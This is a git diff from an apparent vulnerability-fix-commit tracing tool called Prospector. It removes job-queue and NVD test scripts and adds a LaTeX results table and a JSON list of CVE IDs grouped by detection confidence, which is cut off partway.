"http://backend:8000" - - -def run_prospector(vuln_id, repo_url, v_int): - job = get_current_job() - job_id = job.get_id() - url = f"{backend}/jobs/{job_id}" - data = { - "status": job.get_status(), - "started_at": job.started_at.isoformat(), - } - - try: - response = requests.put(url, json=data) - if response.status_code == 200: - response_object = response.json() - print(response_object) - else: - print("Error:", response.status_code) - except requests.exceptions.RequestException as e: - print("Error:", e) - - params = { - "vulnerability_id": vuln_id, - "repository_url": repo_url, - "version_interval": v_int, - "use_backend": True, - "backend_address": backend, - "git_cache": "/tmp/gitcache", - "limit_candidates": 2000, - "use_llm_repository_url": False, - "enabled_rules": config.enabled_rules, - } - try: - results, advisory_record = prospector(**params) - generate_report( - results, - advisory_record, - "html", - f"data_sources/reports/{vuln_id}_{job_id}", - ) - status = "finished" - results = f"data_sources/reports/{vuln_id}_{job_id}" - except Exception as e: - status = "failed" - results = None - logger.error(f"job failed during execution: {e}") - finally: - end_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f") - print(job_id, status, end_time, results) - data = {"status": status, "finished_at": end_time, "results": results} - try: - response = requests.put(url, json=data) - if response.status_code == 200: - response_object = response.json() - print(response_object) - else: - print("Error:", response.status_code) - except requests.exceptions.RequestException as e: - print("Error:", e) - - return f"data_sources/reports/{vuln_id}_{job_id}" - - -def create_prospector_job(vuln_id, repo, version, at_front=False): - with Connection(redis.from_url(redis_url)): - queue = Queue(default_timeout=800) - if at_front: - job = queue.enqueue( - run_prospector, args=(vuln_id, repo, version), at_front=True - ) - else: - job = queue.enqueue(run_prospector, args=(vuln_id, repo, version)) - - return job - - -def connect_to_db(): - db = PostgresBackendDB( - config.database.user, - config.database.password, - config.database.host, - config.database.port, - config.database.dbname, - ) - db.connect() - return db - - -async def enqueue_jobs(): - db = connect_to_db() - processed_vulns = db.get_processed_vulns_not_in_job() - print(processed_vulns) - created_by = "Auto" - for processed_vuln in processed_vulns: - pv_id = processed_vuln["_id"] - pv_repository = processed_vuln["repository"] - pv_versions = processed_vuln["versions"] - v_vuln_id = processed_vuln["vuln_id"] - - try: - job = create_prospector_job(v_vuln_id, pv_repository, pv_versions) - except Exception: - logger.error( - "error while creating automatically the jobs", exc_info=True - ) - - try: - db.save_job( - job.get_id(), - pv_id, - job.args, - job.created_at, - job.started_at, - job.ended_at, - job.result, - created_by, - job.get_status(refresh=True), - ) - except Exception: - logger.error( - "error while saving automatically the jobs", exc_info=True - ) - - db.disconnect() diff --git a/prospector/data_sources/nvd/nvd_test.py b/prospector/data_sources/nvd/nvd_test.py deleted file mode 100644 index 8aa41cb4b..000000000 --- a/prospector/data_sources/nvd/nvd_test.py +++ /dev/null @@ -1,31 +0,0 @@ -from data_sources.nvd.filter_entries import ( - process_entries, - retrieve_vulns, - save_vuln_to_db, -) -from data_sources.nvd.job_creation import enqueue_jobs - -# request new cves entries through NVD API and save to db -cve_data = retrieve_vulns(7) - -# save to db -save_vuln_to_db(cve_data) - - -"""with open("filtered_cves.json", "w") as outfile: - json.dump(filtered_cves, outfile)""" - -print("retrieved cves") -# print(cves) - -# get entry from db and process -processed_vulns = process_entries() -print("ready to be enqueued: ") -print(processed_vulns) - -# if processed_vulns: -# for entry in processed_vulns: -# job_info = create_prospector_job(entry) -# save_job_to_db(job_info) - -enqueue_jobs() diff --git a/prospector/evaluation/.gitignore b/prospector/evaluation/.gitignore deleted file mode 100644 index af49c1aa6..000000000 --- a/prospector/evaluation/.gitignore +++ /dev/null @@ -1,4 +0,0 @@ -data/ -ancient.py -config.yaml -temp.py \ No newline at end of file diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index ff0d026be..9572dc86b 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -148,7 +148,6 @@ def analyse_prospector_reports(filename: str, selected_cves: str): update_summary_execution_table( results=results, total=analysed_reports_count, - filepath=f"{ANALYSIS_RESULTS_PATH}summary_execution/table.tex", ) logger.info(f"Ran analysis on {PROSPECTOR_REPORTS_PATH_HOST}.") @@ -292,7 +291,7 @@ def _save_summary_execution_details( os.path.normpath(PROSPECTOR_REPORTS_PATH_HOST) ) detailed_results_output_path = ( - f"{ANALYSIS_RESULTS_PATH}summary_execution/{batch_name}.json" + f"{ANALYSIS_RESULTS_PATH}summary_execution_{batch_name}.json" ) printout = { "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), diff --git a/prospector/evaluation/data/results/summary_execution_mvi_table.tex b/prospector/evaluation/data/results/summary_execution_mvi_table.tex new file mode 100644 index 000000000..12e81a305 --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_mvi_table.tex @@ -0,0 +1,32 @@ +\begin{table} + \centering + % \tiny + \begin{tabular}{| l c c c c |} + \rowcolor{gray!50} \textbf{Result} & \textbf{Without LLM} & \textbf{\%} & \textbf{With LLM} & \textbf{\%} \\ \hline + High confidence & 960 & 73.56 & 548 & 41.99 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad Commit in reference* \\ + \end{tabular} & 847 & 88.23 & 413 & 75.36 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad CVE ID in message* \\ + \end{tabular} & 162 & 16.88 & 69 & 12.59 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad CVE ID in Issue* \\ + \end{tabular} & 37 & 3.85 & 12 & 2.19 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad Cross Reference* \\ + \end{tabular} & 339 & 35.31 & 135 & 24.64 \\ + \rowcolor{gray!20} \begin{tabular}{l} + \quad Commit is Security Relevant* \\ + \end{tabular} & 0 & 0.0 & 488 & 37.39 \\ + Medium confidence & 179 & 13.72 & 18 & 1.38 \\ + Low confidence & 9 & 0.69 & 6 & 0.46 \\ + Not found (rank $> 10$) & 31 & 2.38 & 11 & 0.84 \\ + Not reported & 103 & 7.89 & 44 & 3.37 \\ + False Positive & 23 & 1.76 & 678 & 51.95 \\ + Aborted (due to exceeding candidate limit) & 14 & 1.07 & 14 & 1.07 \\ + \textbf{Total} & \textbf{1305} & & \textbf{1305} & \\ \hline + \end{tabular} + \caption{Prospector Evaluation Results (* percentage of high confidence category)} + \label{tab:tracer_dataset_results_mvi} +\end{table} \ No newline at end of file diff --git a/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json b/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json new file mode 100644 index 000000000..a5e22b24a --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_mvi_with_llm.json @@ -0,0 +1,2485 @@ +{ + "summary_execution_details": [ + { + "timestamp": "30-08-2024, 09:08", + "results": { + "high": [ + "CVE-2010-5312", + "CVE-2011-1950", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-3923", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1109", + "CVE-2012-1176", + "CVE-2012-2378", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-3536", + "CVE-2012-5812", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1607", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2013-2013", + "CVE-2013-2035", + "CVE-2013-2172", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4111", + "CVE-2013-4116", + "CVE-2013-4316", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1202", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-2525", + "CVE-2014-3120", + "CVE-2014-3250", + "CVE-2014-3488", + "CVE-2014-3576", + "CVE-2014-3577", + "CVE-2014-3579", + "CVE-2014-3599", + "CVE-2014-3612", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-7809", + "CVE-2014-8115", + "CVE-2014-8152", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2014-9970", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1772", + "CVE-2015-1782", + "CVE-2015-1838", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4410", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-5147", + "CVE-2015-6524", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7337", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-8854", + "CVE-2015-8862", + "CVE-2015-9235", + "CVE-2015-9241", + "CVE-2016-0750", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3114", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4000", + "CVE-2016-4442", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-4974", + "CVE-2016-4977", + "CVE-2016-5007", + "CVE-2016-5104", + "CVE-2016-5180", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-8738", + "CVE-2016-9298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10528", + "CVE-2016-10529", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10558", + "CVE-2016-10559", + "CVE-2016-10560", + "CVE-2016-10575", + "CVE-2016-10577", + "CVE-2016-10591", + "CVE-2016-10611", + "CVE-2016-10694", + "CVE-2016-10703", + "CVE-2016-10735", + "CVE-2016-1000236", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2617", + "CVE-2017-2652", + "CVE-2017-2667", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-4973", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5641", + "CVE-2017-5645", + "CVE-2017-5858", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-7674", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-9796", + "CVE-2017-11173", + "CVE-2017-11427", + "CVE-2017-11467", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-12098", + "CVE-2017-12616", + "CVE-2017-12620", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15052", + "CVE-2017-15053", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15703", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15879", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16007", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16136", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16877", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000389", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1260", + "CVE-2018-1261", + "CVE-2018-1263", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3714", + "CVE-2018-3715", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3731", + "CVE-2018-3732", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7408", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8013", + "CVE-2018-8016", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10366", + "CVE-2018-10903", + "CVE-2018-10936", + "CVE-2018-11093", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-13818", + "CVE-2018-14041", + "CVE-2018-14637", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16459", + "CVE-2018-16462", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16490", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17197", + "CVE-2018-17419", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19048", + "CVE-2018-19184", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20801", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000013", + "CVE-2018-1000014", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2018-1999024", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1196", + "CVE-2019-1197", + "CVE-2019-3564", + "CVE-2019-3826", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-7617", + "CVE-2019-7722", + "CVE-2019-8331", + "CVE-2019-8457", + "CVE-2019-9212", + "CVE-2019-9658", + "CVE-2019-9844", + "CVE-2019-10131", + "CVE-2019-10157", + "CVE-2019-10217", + "CVE-2019-10240", + "CVE-2019-10241", + "CVE-2019-10248", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-10682", + "CVE-2019-10745", + "CVE-2019-10748", + "CVE-2019-10749", + "CVE-2019-10750", + "CVE-2019-10751", + "CVE-2019-10752", + "CVE-2019-10760", + "CVE-2019-10762", + "CVE-2019-10764", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10778", + "CVE-2019-10780", + "CVE-2019-10781", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10797", + "CVE-2019-10799", + "CVE-2019-10867", + "CVE-2019-10904", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11512", + "CVE-2019-11514", + "CVE-2019-11767", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12402", + "CVE-2019-12404", + "CVE-2019-12407", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13209", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14806", + "CVE-2019-14837", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15657", + "CVE-2019-15658", + "CVE-2019-16197", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16761", + "CVE-2019-16762", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17496", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18889", + "CVE-2019-18978", + "CVE-2019-18981", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19212", + "CVE-2019-19275", + "CVE-2019-19507", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1010266", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-1928", + "CVE-2020-5219", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5232", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-6836", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8125", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "COMMIT_IN_REFERENCE": [ + "CVE-2010-5312", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1109", + "CVE-2012-1176", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-2013", + "CVE-2013-2035", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4116", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1202", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-3120", + "CVE-2014-3488", + "CVE-2014-3579", + "CVE-2014-3599", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-8115", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1838", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4410", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-5147", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7337", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-9235", + "CVE-2015-9241", + "CVE-2016-0750", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4442", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-5104", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-9298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10577", + "CVE-2016-10703", + "CVE-2016-1000236", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5645", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-11173", + "CVE-2017-12098", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15052", + "CVE-2017-15053", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15879", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16136", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16877", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1099", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3715", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3732", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7408", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8016", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10366", + "CVE-2018-10903", + "CVE-2018-10936", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-13818", + "CVE-2018-14041", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17419", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19048", + "CVE-2018-19184", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20801", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1999024", + "CVE-2019-3564", + "CVE-2019-3826", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-8457", + "CVE-2019-9658", + "CVE-2019-10131", + "CVE-2019-10157", + "CVE-2019-10217", + "CVE-2019-10241", + "CVE-2019-10682", + "CVE-2019-10749", + "CVE-2019-10751", + "CVE-2019-10752", + "CVE-2019-10762", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10781", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10799", + "CVE-2019-10867", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11514", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12402", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14806", + "CVE-2019-14837", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16761", + "CVE-2019-16762", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17496", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18978", + "CVE-2019-18981", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19275", + "CVE-2019-19507", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + "CVE-2019-1000005", + "CVE-2019-1000021", + "CVE-2019-1020012", + "CVE-2020-1747", + "CVE-2020-5219", + "CVE-2020-5224", + "CVE-2020-5227", + "CVE-2020-5229", + "CVE-2020-5232", + "CVE-2020-5236", + "CVE-2020-5249", + "CVE-2020-5390", + "CVE-2020-5529", + "CVE-2020-6836", + "CVE-2020-7597", + "CVE-2020-7981", + "CVE-2020-8131", + "CVE-2020-9283", + "CVE-2020-10236", + "CVE-2020-10591", + "CVE-2020-10672", + "CVE-2020-10673" + ], + "VULN_ID_IN_MESSAGE": [ + "CVE-2013-0256", 